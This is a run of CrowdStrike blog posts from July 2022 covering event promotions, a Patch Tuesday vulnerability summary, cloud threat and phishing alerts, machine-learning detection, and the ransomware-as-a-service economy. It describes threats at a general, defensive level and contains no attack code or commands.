As organizations extend their infrastructure and move to the cloud, adversaries are finding security gaps. In the CrowdStrike 2022 Global Threat Report, our experts reported that organizations face malicious threats to cloud environments as cloud-based services are “increasingly abused by malicious actors … a trend that is likely to continue in the foreseeable future as more businesses seek hybrid work environments.”

At AWS re:Inforce 2022, we’ll show you how to stop cloud breaches through live-action demonstrations of the Falcon platform. CrowdStrike will curate demonstrations that allow you to experience how our cloud security products work in an actual AWS environment and with the AWS console. Our experts are ready to meet and discuss your biggest needs when it comes to cloud, including: 

  • How we integrate our container image scanning features with a DevOps pipeline
  • How a DevOps pipeline builds a container image and pushes it to an ECR registry
  • How a DevOps pipeline deploys an application to an EKS cluster using a container image from an ECR registry
  • How we deploy our container sensor to an EKS cluster to provide protection for vulnerable applications

The Partner Hour

CrowdStrike’s unique cybersecurity partner ecosystem helps simplify your security stack and protect your entire organization from modern adversaries with unified, trusted security solutions to solve real-world security and IT challenges. 

Join us at the Partner Hour hosted every day during AWS re:Inforce to learn how WE STOP BREACHES together with our partners.  

Featured partners will be: 

  • 10:00 a.m. — Netskope: Better Together to Continuously Enforce Zero Trust
  • 10:30 a.m. — ExtraHop: Empower XDR with Network Intelligence
  • 1:00 p.m. — Okta: Simplify Secure Remote Access
  • 1:30 p.m. — Zscaler: Endpoint to Application: Protected
  • 3:00 p.m. — Presidio/AWS: Mitigating Ransomware
  • 3:30 p.m. — Cloudflare: Enhancing and Expanding Zero Trust

Get Your Own Adversary Figure 

Scoring your own limited-edition CrowdStrike adversary figure is easy as 1-2-3. First, get a collectable adversary card when you complete each of the following steps:

  1. Listen to a theater presentation at the CrowdStrike booth 
  2. Engage in a product demo at one of our demo stations
  3. Snap a selfie and tag #GoCrowdStrike (we’ll have adversary masks in the booth for you to wear)

Then show your three adversary cards to a CrowdStrike representative in our booth, and you’ll be rewarded with your very own adversary figure while supplies last!

Meet 1:1 with a CrowdStrike Executive

CrowdStrike executives and leaders will be attending AWS re:Inforce 2022 in person. If you’re interested in a 1:1 onsite meeting, please complete this form

Attend the CrowdStrike Chalk Talk Session

As organizations have embraced the cloud revolution, so too have today’s adversaries. Defending the cloud requires securing a rapidly growing attack surface. IT and security teams must enforce continuous monitoring and security, from the development process to runtime. 

Join our Chalk Talk session where CrowdStrike and AWS experts will outline three steps to mitigate cloud security threats using an adversary-focused approach

  • Shift left and enrich CI/CD processes to detect threats and vulnerabilities before they reach production
  • Provide real-time protection across the control plane
  • Secure hosts and containers at runtime

Session: Three Steps to Mitigate Cloud Threats with CrowdStrike and AWS

When: July 26, 2:45-3:45 p.m. 

Where: Room 203

Speakers

  • Justin Harris, Staff Cloud Solution Architect, CrowdStrike
  • Sameer Vasanthapuram, Principal Product Manager, CrowdStrike
  • Patrick McDowell, Global Technical Lead, Security Partners, AWS

Join Us at the Cloud Security Mixer

Join CrowdStrike, Netskope, ExtraHop and Okta for refreshments and delicious food and to network with peers after Day 1 of AWS re:Inforce, just steps away from the Boston Convention Center.  

Register now — space is limited! 

When: Tuesday, July 26, 5:00-8:00 p.m. ET

Where: M.J. O’Connor’s, The Westin-Boston Floor 1, 425 Summer Street, Boston, MA 02210 

Learn More and Register Today

For more information about AWS re:Inforce 2022 and to register at attend, click here.

Additional Resources 

CrowdStrike’s Adversary Universe World Tour: Coming to a City Near You!

19 July 2022 at 14:43

And we’re off! The CrowdStrike Adversary Universe® World Tour (AUWT) kicked off with a standing-room-only event in Brisbane, Australia on July 12, 2022, followed by another full house in Melbourne on July 18. We’re excited to begin this tour and share insights from CrowdStrike’s elite threat intelligence and security experts with customers around the world.

In the coming weeks and months, our experts will share secrets of the Adversary Universe to give attendees the insight required to defend against adversaries’ constantly evolving tradecraft. Attendees will gain a stronger understanding of the growing enterprise attack surface into the cloud, learn how CrowdStrike helps defend against threats to stop breaches, and hear from our customers about their own perspectives and experiences in fighting today’s threats.

Adversary Universe World Tour: Brisbane, Australia

A Deep Dive Into the Adversary Universe

The AUWT, presented in collaboration with AWS, will show attendees what they need to know to stop the adversaries targeting their organizations. Our experts will answer your most pressing questions: Who are these adversaries? What are their unique motivations? How are they breaking in? And — most importantly — how can they be stopped? 

An adversary-focused approach is essential to defend against the evolving techniques of today’s eCrime, nation state, and hacktivist groups. Organizations operating in different regions of the world sometimes face different threats — which is why we’re bringing this incredible knowledge to you! As we visit cities around the globe, attendees will learn about region-specific threats. Our experts will discuss which industries adversaries prioritize in your region, and the tactics they employ, to keep you a step ahead of these attacks.

We’ll also explore how adversaries seek to disrupt digital transformation by targeting cloud environments. As critical applications and data move to the cloud, adversaries are increasing their attacks and refining tradecraft to exploit vulnerabilities, steal credentials or host malware command-and-control — among other nefarious activities. Understanding these motivations and techniques is the foundation of an adversary-focused approach to security. 

But this critical intelligence is just part of what the AUWT is bringing to you!

Demonstrating the Critical Capabilities Required to Defeat Today’s Adversaries  

Combating today’s adversaries and stopping breaches requires an integrated approach that delivers strong Zero Trust protection across three critical layers: the device layer, the identity layer and the data layer. But this defense-in-depth approach has to work for your organization and users — not against you. Fighting the adversary cannot compromise your productivity.

CrowdStrike has set the bar by providing customers with the industry’s leading platform for unified threat prevention, detection, hunting, intelligence and remediation — all delivered through a single lightweight agent. At each stop on the tour, we’ll demonstrate how the CrowdStrike Falcon® platform is easy to deploy, easy to manage and highly effective at combating adversaries without interfering with users or productivity.

We’ll also unveil and dig deep into our latest innovations, designed to strengthen your security and keep you ahead of today’s threats. Here’s just a taste of some innovations we’ll showcase: 

  • Unified, agent-based and agentless cloud security: CrowdStrike’s cloud-native Falcon platform was built to give organizations comprehensive visibility, detection and remediation capabilities to secure their cloud infrastructure. On the AUWT, we’ll demonstrate why CrowdStrike is the only company to deliver an agent-based and agentless approach to cloud security that provides the flexibility needed to protect cloud environments.
  • Modern identity protection: Adversaries are increasingly using stolen credentials to bypass legacy defenses, masquerade as legitimate users and advance their attacks. Stopping the adversary requires the ability to stop identity-based attacks. Attendees will learn why identity and endpoint protection are better together — and how CrowdStrike is delivering these powerful capabilities through a unified platform approach.
  • Falcon XDR: Beyond the endpoint: The endpoint is the epicenter of enterprise risk and the modern battleground against today’s adversaries. But as attackers evolve their tactics, organizations need to extend detections beyond the endpoint to stop adversaries where they land. We’ll show you how CrowdStrike is extending the industry’s leading endpoint protection and supercharging detection and response across your security stack. We’ll show off major new innovations like the native automation capabilities of Falcon Fusion.

Most important of all, we’ll demonstrate how CrowdStrike continues to deliver the industry’s most powerful protection through an elegant, unified platform that eliminates friction and drives productivity. We’re also excited to show you how our elite team of experts use and manage this technology for customers struggling to fill their security skills gap. CrowdStrike stands alone in the combination of best-in-class technology and the world’s foremost experts in threat hunting and incident response.

CrowdStrike’s Adam Meyers gives a keynote at the AUWT stop in Melbourne, Australia

Upcoming AUWT Events

The AUWT will visit 70 cities around the world. Next up, we’ll continue the tour in Canberra, Australia before traveling to the United States, New Zealand, Malaysia, Singapore, Germany, France, England, Turkey, South Africa, Colombia, Brazil, Chile and several other global destinations in the coming months.

Interested in joining an AUWT event? Below are the cities next on our list, with more to be confirmed in the coming weeks. Hope to see you there!

  • July 20: Canberra, Australia
  • July 21: Charlotte, North Carolina, United States
  • July 22: Sydney, Australia
  • July 26: Tampa, Florida, United States
  • August 3: Auckland, New Zealand
  • August 10: Manila, Philippines
  • August 18: Kuala Lumpur, Malaysia
  • August 23: Nashville, Tennessee, United States
  • August 25: Singapore, Singapore
  • September 13: Istanbul, Turkey
  • September 14: Frankfurt, Germany
  • September 14: Jakarta, Indonesia
  • September 15: Johannesburg, South Africa
  • September 20: Vienna, Austria
  • September 22: Zurich, Switzerland

To find and register for an Adversary Universe World Tour event, you can visit the event website.

Johanna Flower is Interim Chief Marketing Officer at CrowdStrike.

Additional Resources

July 2022 Patch Tuesday: Four Critical CVEs and a Zero-Day Bug Under Active Exploitation

14 July 2022 at 19:51

Microsoft has released 84 security patches for its July 2022 Patch Tuesday rollout. Four vulnerabilities are rated Critical in severity and the rest are classified as Important, with one (CVE-2022-22047) under active exploitation. In this blog, the CrowdStrike Falcon Spotlight™ team offers an analysis of this month’s vulnerabilities, as well as insights into the vulnerabilities and patches affecting Microsoft products in the first half of this year. We highlight the CVEs in this month’s update that are most severe and recommend how to prioritize patching.

July 2022 Risk Analysis

The top three attack types — elevation of privilege, remote code execution (RCE) and information disclosure — continue to dominate, with denial of service following at almost 6%.

Figure 1. Breakdown of July 2022 Patch Tuesday attack types

Microsoft Windows received the most patches this month, with Extended Security Updates (ESUs) following close behind. There are also patches for 33 Azure vulnerabilities this month and a couple for Microsoft Office products.

Figure 2. Breakdown of July 2022 Patch Tuesday affected product families

Zero-Day CSRSS Vulnerability Under Active Exploitation

CVE-2022-22047 is listed as being under active attack, but there’s no information from Microsoft on where, or how widely, the vulnerability is being exploited. This vulnerability allows an attacker to execute code as SYSTEM, provided they can execute other code on the target. Bugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. These attacks often rely on macros, which are now disabled by default.

Rank CVSS Score CVE Description
Important 7.8 CVE-2022-22047 Windows CSRSS Elevation of Privilege

CrowdStrike recommends that you monitor your environment to see if it is affected by this vulnerability and apply the fix offered. For CrowdStrike customers using Falcon Spotlight, this CVE is ranked as Critical.

Critical Vulnerabilities in Network File System and RPC

Four vulnerabilities ranked as Critical received patches this month. Affected products are Remote Procedure Call (RPC), Windows Network File System (NFS) and Windows Graphics Component. Let’s review a couple of these vulnerabilities and how they could affect an organization’s environment.

CVE-2022-22038: This vulnerability could allow a remote, unauthenticated attacker to exploit code on an affected system. While not specified in the bulletin, the assumption is that, with elevated privileges, code execution would occur. By combining these attributes, you may end up with a potentially wormable bug. Microsoft rates the attack complexity as high since an attacker would need to make “multiple exploitation attempts” to take advantage of this vulnerability, but again, unless you are actively blocking RPC activity, you may not see these attempts. If the exploit complexity were rated low, which some would argue it should be since the attempts could likely be scripted, the CVSS would be 9.8. CrowdStrike recommends that you test and deploy this patch quickly.

CVE-2022-22029: This is the third month in a row with a Critical-rated NFS vulnerability, and while this one has a lower CVSS than the previously listed vulnerabilities, it could still allow a remote, unauthenticated attacker to execute their code on an affected system with no user interaction. Microsoft notes multiple exploit attempts may be required to do this, but unless you are specifically auditing for this, you may not notice. If you’re running NFS, make sure you don’t ignore this patch.

Rank CVSS Score CVE Description
Critical 8.8 CVE-2022-30221 Windows Graphics Component Remote Code Execution Vulnerability
Critical 8.1 CVE-2022-22038 Remote Procedure Call Runtime Remote Code Execution Vulnerability
Critical 8.1 CVE-2022-22029 Windows Network File System Remote Code Execution Vulnerability
Critical 7.5 CVE-2022-22039 Windows Network File System Remote Code Execution Vulnerability

Important Azure Site Recovery Service Vulnerabilities

Based on the total count of Azure vulnerabilities addressed this month, this set of CVEs should be prioritized. Azure Site Recovery is primarily a cloud-based service, but there are some on-premises components. An automatic update for these vulnerabilities is very unlikely to happen. Microsoft recommends upgrading to version 9.49 to remediate these vulnerabilities. Instructions can be found in this article. It’s incredibly unusual to see so many CVEs addressed in a single month for a single component.

Rank CVSS Score CVE
Important 8.3 CVE-2022-33674
Important 7.8 CVE-2022-33675
Important 7.2 CVE-2022-33677
Important 7.2 CVE-2022-33676
Important 7.2 CVE-2022-33678
Important 6.5 CVE-2022-30181
Important 6.5 CVE-2022-33641
Important 6.5 CVE-2022-33643
Important 6.5 CVE-2022-33655
Important 6.5 CVE-2022-33656
Important 6.5 CVE-2022-33657
Important 6.5 CVE-2022-33661
Important 6.5 CVE-2022-33662
Important 6.5 CVE-2022-33663
Important 6.5 CVE-2022-33665
Important 6.5 CVE-2022-33666
Important 6.5 CVE-2022-33667
Important 6.5 CVE-2022-33672
Important 6.5 CVE-2022-33673
Important 4.9 CVE-2022-33642
Important 4.9 CVE-2022-33650
Important 4.9 CVE-2022-33651
Important 4.9 CVE-2022-33653
Important 4.9 CVE-2022-33654
Important 4.9 CVE-2022-33659
Important 4.9 CVE-2022-33660
Important 4.9 CVE-2022-33664
Important 4.9 CVE-2022-33668
Important 4.9 CVE-2022-33669
Important 4.9 CVE-2022-33671
Important 4.4 CVE-2022-33652
Important 4.4 CVE-2022-33658

Falcon Spotlight provides the visibility SecOps teams need to quickly identify which vulnerabilities are prevalent in your organization’s environment. Since Falcon Spotlight is completely integrated within the CrowdStrike Falcon® platform, IT staff are able to take swift action by isolating potentially compromised hosts from exploited vulnerabilities. Additionally, the Falcon platform mitigates the risk from vulnerabilities that cannot be patched rapidly by detecting and automatically preventing exploitation attempts and post-exploitation activity.

Managing Vulnerabilities Is Ultimately about the Long Game

As evident in these monthly patch rollouts, no product is safe from vulnerabilities. Attackers will use any weakness to gain access, exploit flaws and move laterally to take advantage of your organization. While prioritization and patching are vital for immediately addressing critical issues, what makes a vulnerability management program successful is planning for the long term.

When your organization is planning for the long term, reviewing everything within your environment is important. Patching should not be done in a vacuum — it requires open communication with other parts of your cybersecurity organization and cross-collaboration with IT hygiene, threat intelligence and compliance teams to fully understand which areas of risk your organization might be exposed to and the types of threats or attackers are more likely to take advantage.

Organizations rely on full-suite platforms that offer comprehensive solutions to do this in a timely manner. Your staff should be able to make accurate and actionable recommendations based on any kind of suspicious activity surrounding the assets and entities in your environment while having access to relevant contextual data to provide the insight needed to make appropriate decisions to protect your environment. CrowdStrike stands resolutely behind this. When we say “We stop breaches,” we offer a holistic approach to creating a defensible security posture — and we do it in a way that is relevant, timely and accessible to all who are responsible for keeping your defenses strong. Beyond Falcon Spotlight, we suggest you try our Falcon platform to see how CrowdStrike can enable your team for success.

Learn More

This video on Falcon Spotlight™ vulnerability management shows how you can quickly monitor and prioritize vulnerabilities within the systems and applications in your organization.

About CVSS Scores

The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate software vulnerabilities’ severity and characteristics. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a severity rating for CVSS scores. Learn more about vulnerability scoring in this article.

Additional Resources

  • Learn more about vulnerabilities that can affect your environment at Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21!  
  • See how Falcon Spotlight can help you discover and manage vulnerabilities in your environments. 
  • Read how CrowdStrike Asset Graph works in conjunction with Falcon Discover to offer you advanced insights on how suspicious activity is related to other assets within your environment. 
  • Learn how Falcon Identity Protection products can stop workforce identity threats faster. 
  • Download the CrowdStrike 2022 Global Threat Report to learn who and what is affecting your environment.
  • Make prioritization painless and efficient. Watch how Falcon Spotlight enables IT staff to improve visibility with custom filters and team dashboards.
  • Test CrowdStrike next-gen AV for yourself with a free trial of Falcon Prevent™.

Top Threats You Need to Know to Defend Your Cloud Environment

11 July 2022 at 00:01

The CrowdStrike eBook, “Protectors of the Cloud: Combating the Rise in Threats to Cloud Environments,” reveals how adversaries target and infiltrate cloud environments and recommends best practices for defense.

As organizations move critical applications and data to the cloud, these resources have come under increasing attack. Adversaries view cloud environments as soft targets and continue to refine tactics and tradecraft to exploit the vulnerabilities and misconfigurations within them. 

Though this attack trend was underway before the COVID-19 pandemic, the need to support mostly remote, distributed workforces increased organizations’ reliance on cloud resources — which in turn amplified adversaries’ focus on exploiting the cloud. Attackers were circling throughout 2021, often attempting to compromise cloud infrastructure and assets by exploiting misconfigurations and stolen user credentials. 

In “Protectors of the Cloud: Combating the Rise in Threats to Cloud Environments,” we outline common attack vectors adversaries use to breach cloud environments, including credential theft, vulnerability exploitation, abuse of cloud service providers, exploitation of misconfigured image containers, and use of cloud services for hosting malware and command and control. 

Additionally, you will learn:

  • How state-sponsored adversaries, such as COZY BEAR, target IT and cloud service providers to exploit trusted relationships and supply chain partners 
  • How sophisticated adversaries harvest, then exploit stolen credentials and identities to amplify ransomware big game hunting (BGH) attacks and infiltrate cloud environments
  • How malicious actors intensify attacks on critical cloud infrastructure by exploiting misconfigured image containers and targeting vulnerabilities
  • How adversaries target neglected cloud infrastructure slated for retirement that still contains sensitive data
  • Which best practices cloud security experts recommend for defending cloud infrastructure

Adversaries Seek to Exploit Trust in the Cloud 

The ebook shows how, in addition to credential theft and vulnerability exploitation, adversaries leverage cloud service providers in an attempt to abuse the trust between these service providers and their customers. In doing so the adversary seeks access to additional targets through lateral movement from cloud-hosted enterprise authentication assets. If an adversary can elevate their privileges to global administrator levels, they may be able to pivot between related cloud tenants to expand their access. Other covered adversarial tactics and trends include exploiting misconfigured image containers and using legitimate cloud services to host malware and perform command and control activities. 

The ebook also describes the tactics of two significant threat groups, FANCY BEAR and COZY BEAR, that are Russian in origin and target cloud services as part of their strategy. 

  • In 2021, FANCY BEAR targeted numerous cloud-based email providers — including Microsoft O365 and webmail services likely to be used by individuals — using a variety of tactics. Credential theft is a critical part of FANCY BEAR’s strategy, which serves as a reminder that organizations should focus on anti-phishing technologies and user awareness training to aid the identification of phishing emails and other credential-stealing techniques. 
  • COZY BEAR has demonstrated extensive knowledge of cloud service infrastructure and administration as well as the use of extensive operational security methods to reduce their chances of being detected.

Given threat actors’ increasing focus on attacking the cloud, CrowdStrike takes an adversary-focused approach that unifies on-premises and cloud security by combining capabilities such as cloud security posture management and cloud workload protection for multicloud environments with the latest threat intelligence. As adversaries grow more sophisticated, protecting cloud assets will likely become more complex. Battling these adversaries will require a comprehensive approach to security that enables organizations to maintain compliance, visibility and enforcement regardless of where their data and applications reside.

Additional Resources

Callback Malware Campaigns Impersonate CrowdStrike and Other Cybersecurity Companies

Today CrowdStrike sent the following Tech Alert to our customers:

On July 8, 2022, CrowdStrike Intelligence identified a callback phishing campaign impersonating prominent cybersecurity companies, including CrowdStrike. The phishing email implies the recipient’s company has been breached and insists the victim call the included phone number. This campaign leverages similar social-engineering tactics to those employed in recent callback campaigns including WIZARD SPIDER’s 2021 BazarCall campaign.

This campaign will highly likely include common legitimate remote administration tools (RATs) for initial access, off-the-shelf penetration testing tools for lateral movement, and the deployment of ransomware or data extortion.

Details

The callback campaign employs emails that appear to originate from prominent security companies; the message claims the security company identified a potential compromise in the recipient’s network. As with prior callback campaigns, the operators provide a phone number for the recipient to call (Figure 1).

Figure 1. Example of CrowdStrike-Themed Phishing Email

Historically, callback campaign operators attempt to persuade victims to install commercial RAT software to gain an initial foothold on the network. For example, CrowdStrike Intelligence identified a similar callback campaign in March 2022 in which threat actors installed AteraRMM followed by Cobalt Strike to assist with lateral movement and deploy additional malware. 

Assessment

While CrowdStrike Intelligence cannot currently confirm the variant in use, the callback operators will likely use ransomware to monetize their operation. This assessment is made with moderate confidence, as 2021 BazarCall campaigns would eventually lead to Conti ransomware — though this ransomware-as-a-service (RaaS) recently ceased operations. This is the first identified callback campaign impersonating cybersecurity entities and has higher potential success given the urgent nature of cyber breaches.

CrowdStrike will never contact customers in this manner.

Any customers receiving an email such as those in this Alert should forward phishing emails to [email protected]

Additional Resources

How CrowdStrike’s Machine Learning Model Automation Uses the Cloud to Maximize Detection Efficacy

1 July 2022 at 13:41
  • The CrowdStrike Falcon® platform takes full advantage of the power of the CrowdStrike Security Cloud to reduce high-cost false positives and maximize detection efficacy to stop breaches 
  • CrowdStrike continuously explores novel approaches to improve machine learning automated detection and protection capabilities for Falcon customers
  • CrowdStrike’s cloud-based machine learning model automation can predict 500,000 feature vectors every second and cover 10TB of files per second to find detections

 At CrowdStrike, we combine cloud scale with machine learning expertise to improve the efficacy of our machine learning models. One method for achieving that involves scanning massive numbers of files that we may not even have in our sample collections before we release our machine learning models. This prerelease scan allows us to maximize the efficacy of our machine learning models while minimizing negative impact of new or updated model releases.

It’s important to understand that machine learning models take over when discrete algorithms fall short. CrowdStrike machine learning does an excellent job of creating models that can detect impactful in-the-wild novel threats like NotPetya, BadRabbit or HermeticWiper along with other malware families. CrowdStrike’s comprehensive detection capabilities have been consistently validated in independent third-party testing from leading organizations including AV-Comparatives. However, machine learning looks at the world through probabilities, and those probabilities can make understanding why an incorrect detection was made unpredictable and difficult to understand.

Incorrect detections, also known as false positives, are a concern with any endpoint security solution and exacerbate the ongoing skills shortage most organizations face. Any incorrect assessment of a clean file as malicious can immediately trigger remediation procedures that can take down services, disrupt workflows and distract analysts from hunting down legitimate threats. However, not all false positives are created equal, for the cost of any mistakes should be compared to the benefit given by correct detections. CrowdStrike has implemented novel solutions to the false positive predicament.

Clean or Dirty: Know the Difference

One approach involves accumulating billions of files in our cloud. These files come from various sources, ranging from protected environments to public malware collections, at a rate of approximately 86 million new hashes a day. The collection includes malicious code, clean code and unwanted code, such as potentially unwanted programs. 

To build our machine learning models, we carefully curate both clean and “dirty” (i.e., malicious) samples from this collection, resulting in a labeled collection that is growing by tens of millions of new examples every training cycle.

Extract the Right Features

To ensure the quality of the resulting models, we also gather from live environments the most interesting files to maximize the efficacy of the model. While some customers use the Falcon platform to share files with us so we can improve our coverage capabilities, others keep their files in-house for a variety of reasons. As a consequence, to build an effective model, we must ensure that it can perform well on in-house files not shared with us as well as on those that have been shared. However, to teach a machine learning model, first you must reduce these interesting files to a long list of transformed numeric values, called a feature vector, that represent various properties of the file. 

As humans, we learn to use our senses to extract features from the surrounding environment and then infer probable outcomes based on past experience. For example, if it’s cloudy outside and there’s a damp breeze, we infer there’s a high chance of rain and we need to grab an umbrella. In this case, cloudy and damp can be considered data points part of the feature vector that describes chances of rain. 

Of course, the feature list for files contains thousands of decimal numbers that humans can’t read but our artificial intelligence (AI) understands. That feature vector is uploaded to the cloud by the Falcon sensor, making it possible for us to observe what a new model would say about the underlying file by running predictions over that stored feature vector.

Figure 1. This flow describes how feature vectors and metadata are sent to the CrowdStrike Security Cloud and used against our machine learning model to help build better predictions.

Returning to the rain example, the feature vector with the two data points of cloudy and damp is assessed against what we know from experience to be signs of rain. If our experience has taught us that these two particular data points have a high probability of describing chances of rain, then we grab an umbrella. Otherwise, we assess this with low chances of rain. Much like machine learning models, it comes down to how well we are trained in spotting and recognizing signs of rain.

Measure Efficacy, Get It Right!

The same file feature vector can also be combined with additional information such as the prevalence of files that is contained within our security cloud. This means we can virtually scan all prevalent files in protected environments to measure efficacy and test for false positives. 

The results of this virtual scan are important for a number of reasons. First, it enables us to identify important files which will have a high impact in the next model release.  Second, we can minimize potential high-cost false positives prior to deployment.  Finally, this information is used to teach future models. 

For example, based on a prevalence threshold, we advance our scan to include all files found on a significant number of devices. We then consider all of our detections. Those that are incorrect we resolve with our cloud by replying to our sensors to prevent future detection, and include the files that triggered an incorrect detection in the next retrain of our model. Correct detections, on the other hand, are added both to our cloud for immediate detection and to the files used in training our models in the future. 

Again, returning to the rain example, this virtual scan is like checking multiple weather forecasting websites as soon as we have the two signs — cloudy and damp — before leaving the house with or without an umbrella. Some of those websites may be correct in predicting rain, others may not, but the next time it’s cloudy and damp we will know which websites are reliable before we go outside and risk being caught in the rain without an umbrella.

CrowdStrike’s Automated Cloud-Based Machine Learning Model Maximizes Efficacy

While CrowdStrike analysts inspect millions of files, the number of files detected as malicious is remarkably small enough that they can be analyzed by hand. Because our analysts and processes work better on samples that we have instead of information about samples, we start our analysis with those detections we can also find in our massive sample store. 

Using feature vectors, the Falcon platform enables us to know quite a bit about the files we don’t have, and also allows us to use the power of the cloud to enhance detection or resolve incorrect detections of files not contained in our sample store.

Comparing global virtual scans of prevalent files against all of our static detection models is critical in pushing the accuracy and efficacy of our machine learning models to help secure our customers and stop breaches.

In essence, the power of the Falcon platform lies in its ability to take full advantage of the massive data fabric we call the CrowdStrike Security Cloud, which correlates trillions of security events from protected endpoints with threat intelligence and enterprise telemetry. The Falcon platform uses machine learning and AI to automate and maximize the efficacy of detecting and protecting against threats, to stop breaches.

Additional Resources

  • Find out more about machine learning and the power of the CrowdStrike Security Cloud at Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21!  
  • Learn more about the CrowdStrike Falcon® platform by visiting the product webpage.
  • Test CrowdStrike next-gen AV for yourself. Start your free trial of Falcon Prevent™ today.

Tales from the Dark Web: How Tracking eCrime’s Underground Economy Improves Defenses

30 June 2022 at 19:46

Cybercriminals are constantly evolving their operations, the methods they use to breach an organization’s defenses and their tactics for monetizing their efforts. 

In the CrowdStrike 2022 Global Threat Report, we examined how the frequency and sophistication of ransomware attacks has grown in the past year. CrowdStrike Intelligence observed an 82% increase in ransomware-related data leaks in 2021 compared with 2020; further, we found 62% of attacks use hands-on-keyboard activity — indicating adversaries continuously advance their tradecraft to bypass legacy security solutions and extort victims via highly targeted data leaks. What are the forces driving this growth, and how exactly do cybercriminals make money?

The Fast-Growing, Lucrative Business Model Enabled by RaaS

Ransomware is not new; adversarial groups have relied on compromises for many years. However, over the past 2-3 years, their strategy has started to shift toward a more community based business model enabled by ransomware-as-a-service (RaaS) platforms that allow smaller, less advanced criminals to join a larger operation. 

At the top of this model is an operator who sets up a RaaS platform that takes care of multiple technical tasks such as on-demand ransomware packaging, command and control of deployed ransomware, cryptography, data extraction, archiving, online extortion and others. 

Less sophisticated cybercriminals with minimal hacking knowledge can join this operation after being vetted; when they do, they’ll receive 70 to 80% of the paid ransom. These emerging criminals are also assisted by access brokers, through which they can acquire access to the infrastructure of a potential victim. The interaction between all these criminal entities — RaaS operators, vetted affiliates, access brokers and other participants — happen via criminal forums, underground markets and anonymous posts. CrowdStrike continuously monitors these environments, and users may receive alerts regarding market and forum activity.

Access Brokers: How Adversaries Get In

The eCrime kill chain is often enabled by access brokers, the intruders who gain access to an organization’s infrastructure and then sell illicitly obtained credentials and other access methods to buyers in underground communities.

Adversaries buy compromised credentials to make the process of getting into a target organization easier and more efficient. Access brokers sell a broad range of access types, including financial account logins, business email account credentials, remote access to network assets and custom exploits for IT infrastructure.

To advertise compromised credentials and other access methods on the underground, access brokers use particular keywords and target specific marketplaces. However, their posts often leave behind “breadcrumbs” that offer defenders an opportunity to detect compromised accounts or risks of security incidents. For example, an access broker may include attributes such as company details (size, revenue, industry), IT infrastructure details, the malware used to steal credentials, or the access broker’s alias.

The amount of chatter on underground forums is massive. CrowdStrike’s managed service, Falcon X Recon+ provides security teams assistance by offering custom expertise to monitor and triage threats found in these forums on your behalf. CrowdStrike experts can guide organizations of all sizes to identify unwanted data exposure or threats like account takeovers and brand-targeted attacks. 

Distribution Services: A Force Driving Ransomware

CrowdStrike’s analysis of ransomware campaigns by groups such as Pinchy Spider, also known as REvil, Wizard Spider (Conti) and Carbon Spider (DarkSide) has made it clear the operators behind these campaigns no longer work alone, in particular when compromising assets and injecting the ransomware. Ransomware operators advertise on underground forums to recruit affiliates who can help them distribute ransomware and share the profits. 

These affiliates leverage RaaS infrastructure from the operators. After targeting and compromising a victim’s assets, they drop ransomware from the RaaS platform, set the ransom demand and get 70 to 80% of the ransom payment in return. Victims are often chosen based on the likelihood they’ll be able to afford a ransom; affiliates often calculate ransom payouts based on company revenue and business impact to maximize their profits. 

Operators provide technical services in return for affiliates’ help in distributing ransomware. They may provide a packager to generate customized ransomware so affiliates can distribute over their own channels; cryptographic key management; or internet infrastructure for data exfiltration and storage. They may share payment instructions to receive virtual currencies from victims; secret communication channels to hide affiliates when they talk to victims; and even a help desk to aid victims in paying the ransom. These services give a boost to less tech-savvy adversaries, who benefit from access to technically advanced malware at low cost. 

CrowdStrike Intelligence analysts found multiple initial access and lateral movement techniques that affiliates use before deploying ransomware. By changing how they distribute ransomware, adversaries can find new ways to bypass security measures. Below are a few examples of how attackers gain initial access:

  • Buying stolen credentials from access brokers. Affiliates often use legitimate  credentials to gain a foothold. Remote Desktop Protocol (RDP) is a popular entryway.
  • Spam or social engineering. Among the most common initial access vectors.
  • Vulnerability scanning and exploit kits. These kits can be found on multiple forums and target specific software or systems to gain access and install additional code . Exploit kits can be combined with phishing campaigns to boost their effectiveness.
  • Loader and botnet usage. Loaders, often a step between phishing campaigns and ransomware deployment, use malicious documents like macro-enabled spreadsheets to download and execute malicious code.
  • Post-exploitation tools and “living off the land.” Adversaries that access a system will explore the network to find critical data or applications that can help further an attack. Some use system tools like PSExec or PowerShell scripts to remain hidden.

A better understanding of adversary techniques can help improve your defenses. Organizations must know which attackers are targeting their region or industry, whether they are recruiting affiliates, and how their ransomware is distributed.By understanding the adversary and their tools, defenders can employ an intelligence-first defense strategy based on the threats they face.

Monetization: How Cybercrime Pays

Once ransomware is deployed into a victim environment, the prize needs to be split and monetized into other payment forms. CrowdStrike’s observations of the cybercrime ecosystem offer new insights into adversaries, their transactions and valuation of recent compromises — all of which can help defenders understand how money flows in cybercrime and strengthen their security strategies.

Adversaries constantly evolve their monetization techniques to maximize the chance of payment. Their methods are working: reports from the U.S. Treasury Department’s Financial Crimes Enforcement Network (FinCen) and the Office of Foreign Assets Control (OFAC) underscore how lucrative ransomware has become. FinCen found the value of suspicious activity detailed in ransomware-related suspicious activity reports (SARs) was $590 million USD in the first six months of 2021 — far higher than the $416 million USD reported in all of 2020. Further, CrowdStrike’s Intelligence team also tracks ransomware demands: in 2021, we calculated an average demand of $6.1 million USD, an increase of 36% from 2020. 

If a victim refuses to pay ransom, their data may be auctioned by the threat actor so they can still make money on it by selling it to other parties or adversaries.

Corporate data is valuable to all adversaries. Once they have it, the data can be easily monetized and present increased risk to your organization if other attackers have access to it. Defenders must develop a stronger understanding of cybercriminals’ behavior — and the broader eCrime ecosystem — in order to make smarter security decisions that best protect data as their most valuable asset.

In the “Tales from the Dark Web” white paper series, we explore the increased specialization of adversaries inside the criminal underground. This includes the changing tradecraft for gaining initial access, achieving lateral movement, exfiltrating data and leveraging it to extort their targets. By understanding how adversaries specialize in these critical areas to gain scale and efficiency, organizations can better prepare their defenses. 

Rather than simply illustrate the problems defenders face, the insights from these white papers will arm security teams with actionable information, enabling them to better prepare for the attacks emerging from the criminal underground. 

Additional Resources

Detecting and Mitigating NTLM Relay Attacks Targeting Microsoft Domain Controllers

29 June 2022 at 18:52

